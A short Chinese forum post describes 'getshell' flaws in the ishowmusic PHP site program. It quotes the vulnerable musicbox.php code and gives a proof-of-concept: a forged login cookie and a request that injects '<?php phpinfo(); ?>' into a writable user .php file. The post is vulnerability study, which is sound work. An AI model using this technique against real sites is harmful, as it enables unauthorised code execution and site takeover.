ishowmusic getshell

2012-07-08 10:07:43 6 2990


在某非主流站上看到的这套程序.就下来学习一下.
这个程序好多getshell .  
//漏洞代码
    musicbox.php
if (GetCookie('userlogin')!="1"){  //验证方式...

        Showmsg("no","您还没有登录或注册!","登录或注册", "login.php?jumpurl=musicbox.php");

        exit; 

  }

   else { $username=GetCookie('username'); }
//写文件
$line=$songname."|".$singer."|".$songid."|".$addtime."|\n";

         writetofile("$userdir/{$username}_box.php",$line);
setcookie为username=admin; userlogin=1

访问 http://www.baidu.com/musicbox.php?songid=1&songname=ddddd&singer=<?php%20phpinfo();%20?>&action=add
如果不行把歌曲ID换下
shell地址 http://www.baidu.com/user/admin_box.php  //前提user目录默认
类别 Web安全

关于作者

残花败柳19篇文章244篇回复

败家博客

残花败柳
6

评论6次

要评论?请先  登录  或  注册